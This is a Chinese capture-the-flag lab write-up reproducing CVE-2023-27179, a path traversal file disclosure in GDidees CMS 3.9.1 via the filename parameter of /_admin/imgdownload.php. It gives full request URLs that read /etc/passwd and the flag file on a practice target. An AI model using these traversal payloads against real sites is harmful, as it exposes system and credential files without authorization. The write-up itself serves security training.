GDidees CMS v3.9.1本地文件泄露漏洞(CVE-2023-27179)

漏洞简介:

GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。

漏洞环境:

春秋云镜中的漏洞靶标,CVE编号为CVE-2023-27179

漏洞复现:

进入靶场发现没有什么可以利用的地方,那么就按照靶场提示来,直接访问/_admin/imgdownload.php

打开后发现是一片空白,那么直接上参数filename

第一次尝试

复制代码
http://eci-2ze1l7f5cevdmi4pngfi.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../etc/passwd

发现下载了一张图片

用notepad++打开图片发现确实获取到了用户的信息

那么直接获取flag

复制代码
eci-2ze1l7f5cevdmi4pngfi.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../flag

或者还有一种办法是我们用bp抓包,放到重放器里,可以直接回显出文件内容

或者是直接用curl指令请求

相关推荐
醇氧3 小时前
在 Spring Service 中使用 private final Gson gson = new Gson(); 是否安全?
java·安全·spring
梦里不知身是客113 小时前
网络安全中对称算法和非对称算法的作用和区别
安全·web安全
一岁天才饺子3 小时前
XSS漏洞总结复盘
web安全·网络安全·xss
bleach-4 小时前
buuctf系列解题思路祥讲--[极客大挑战 2019]HardSQL1——sql报错注入
数据库·sql·安全·web安全·网络安全
Z3r4y5 小时前
【Web】Jsrpc+Mitmproxy+Burp通关encrypt-labs
web安全·js逆向·jsrpc·encrypt-labs
知白守黑V6 小时前
OWASP 2025 LLM 应用十大安全风险深度解析
人工智能·安全·ai agent·ai智能体·ai应用·ai安全·大模型安全
合才科技6 小时前
【要闻周报】网络安全与数据合规 12-13
网络·安全
lingggggaaaa6 小时前
CS配合CrossC2插件,实现MacOS/Linux上线
linux·运维·笔记·安全·macos
christine-rr6 小时前
【网络安全实验】IPSec的配置与实现
网络·计算机网络·安全·web安全·网络安全
是喵斯特ya7 小时前
常用的webshell工具流量分析
安全·web安全